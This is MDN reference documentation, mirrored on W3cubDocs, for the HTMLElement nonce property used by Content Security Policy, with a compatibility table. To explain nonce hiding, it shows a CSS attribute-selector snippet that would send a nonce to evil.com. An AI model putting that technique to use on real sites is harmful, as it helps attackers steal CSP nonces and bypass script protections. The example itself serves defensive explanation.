W3cubDocs

/Web APIs

HTMLElement: nonce property

The nonce property of the HTMLElement interface returns the cryptographic number used once that is used by Content Security Policy to determine whether a given fetch will be allowed to proceed.

In later implementations, elements only expose their nonce attribute to scripts (and not to side-channels like CSS attribute selectors).

Examples

Retrieving a nonce value

In the past, not all browsers supported the nonce IDL attribute, so a workaround is to try to use getAttribute as a fallback:

js

let nonce = script["nonce"] || script.getAttribute("nonce");

However, recent browsers version hide nonce values that are accessed this way (an empty string will be returned). The IDL property (script['nonce']) will be the only way to access nonces.

Nonce hiding helps prevent attackers from exfiltrating nonce data via mechanisms that can grab data from content attributes like this CSS selector:

css

script[nonce~="whatever"] {
  background: url("https://evil.com/nonce?whatever");
}

Specifications

Browser compatibility

Desktop Mobile
Chrome Edge Firefox Internet Explorer Opera Safari WebView Android Chrome Android Firefox for Android Opera Android Safari on IOS Samsung Internet
nonce 61 79 75 No 48 16
10–16The property is defined only for its useful elements: <link>, <script>, and <style>; it is undefined for all other elements.
61 61 79 45 16
10–16The property is defined only for its useful elements: <link>, <script>, and <style>; it is undefined for all other elements.
8.0

See also

© 2005–2023 MDN contributors.
Licensed under the Creative Commons Attribution-ShareAlike License v2.5 or later.
https://developer.mozilla.org/en-US/docs/Web/API/HTMLElement/nonce